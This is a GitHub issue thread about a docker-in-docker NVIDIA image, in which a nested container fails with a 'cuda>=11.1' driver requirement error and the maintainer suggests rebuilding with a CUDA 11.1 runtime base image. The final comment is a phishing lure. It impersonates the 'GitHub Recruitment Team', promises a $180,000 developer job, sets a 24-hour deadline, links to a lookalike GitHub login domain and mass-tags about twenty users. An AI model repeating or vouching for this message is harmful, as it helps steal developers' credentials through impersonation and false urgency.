### ISSUE TITLE
running nvidia container complains about missing cuda version / nvidia-smi

### ISSUE THREAD

**Issue by scott-createplay** [Henderake/dind-nvidiadocker#1]
Hey there Shyh-Horng Yeh,

I tried running my container from inside your base image with the following command. Am I doing something wrong?

command to start outer container:
`docker run --privileged -ti --rm --runtime=nvidia -v /var/run/docker.sock:/var/run/docker.sock henderake/dind:nvidia-docker /bin/bash`

command run from inside that container:
`docker run --privileged -dit  --runtime=nvidia -v /var/run/docker.sock:/var/run/docker.sock <my_image_name>`

I get the following error:
`
docker: Error response from daemon: OCI runtime create failed: container_linux.go:370: starting container process caused: process_linux.go:459: container init caused: Running hook #1:: error running hook: exit status 1, stdout: , stderr: nvidia-container-cli: requirement error: unsatisfied condition: cuda>=11.1, please update your driver to a newer version, or use an earlier cuda container: unknown.
root@b3173d4ce408:/# nvidia-smi
`

Any thoughts? I know it's been 2 years since you updated this. Have you moved on to another approach?

**Comment by Henderake** [comment]
Hi Scott,

I no longer use this container and have no environment to update/test the approach anymore. I think one thing you can try is to follow the step in https://github.com/Henderake/dind-nvidia-docker#building-image and specify `CUDA_IMAGE` to `nvidia/cuda:11.1-runtime` with --build-arg.

**Comment by peters-arrival** [comment]
Thanks Shyh-Horng Yeh!

Just out of curiosity... have you moved away from graphics? Or have you moved to proprietary solutions for hardware accelerated containers?

Thanks again!
-s

**Comment by Henderake** [comment]
Yeah I used to work on deep learning and switched to another field last year so this docker image isn't actively maintained since then. I didn't try any proprietary solutions before.

Did changing to `nvidia/cuda:11.1-runtime` work?

**Comment by rarents1975** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
cem2ran, @hantablack9, @bubalazi, @aelnouby, @Kevsl, @Cemberk, @zhouyuan, @andrewhinh, @Rohan5manza, @anthonyrussano, @chuxiuhong, @rmgogogo, @ponrin, @haormj, @hitorilabs, @TakeruEndo, @zachbrehm, @navneet1083, @Artein, @p-nordmann
